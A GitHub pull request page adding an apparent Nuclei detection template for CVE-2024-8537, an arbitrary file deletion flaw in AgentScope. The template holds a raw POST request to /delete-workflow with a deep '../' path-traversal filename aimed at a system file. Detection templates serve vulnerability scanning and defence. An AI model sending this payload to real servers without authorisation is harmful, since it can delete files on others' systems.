Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Create CVE-2024-8537.yaml #11255

Closed
wants to merge 2 commits into from
Closed
Changes from all commits
Commits
File filter

Filter by extension

Filter by extension

Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
39 changes: 39 additions & 0 deletions http/cves/CVE-2024-8537.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,39 @@
id: CVE-2024-8537

info:
name: AgentScope - Arbitrary File Delete
author: gy741
severity: critical
description: |
The agentscope application is vulnerable to a path traversal vulnerability in /delete-workflow endpoint that allows any attacker to be able to delete arbitrary files from the filesystem .
impact: |
The vulnerability allows for path traversal, enabling an attacker to delete arbitrary files on the affected system. By exploiting improper input validation or insufficient access controls, the attacker can manipulate file paths to delete sensitive files outside of the intended directory.
reference:
- https://huntr.com/bounties/eeb8aa4b-e6e5-465c-b0dd-aa97e3b7dc09
- https://nvd.nist.gov/vuln/detail/CVE-2024-8537
tags: cve2024,cve,agentscope,oss,lfi,huntr,lfprojects

http:
- raw:
- |
POST /delete-workflow HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json

Check failure on line 22 in http/cves/CVE-2024-8537.yaml

View workflow job for this annotation

GitHub Actions / lint

22:1 [trailing-spaces] trailing spaces
{"filename":"../../../../../../../../../../../../../../../../../etc/passwwd"}

matchers-condition: and
matchers:
- type: word
part: body
words:
- 'Workflow file deleted successfully'

- type: status
status:
- 200

- type: word
part: header
words:
- 'application/json'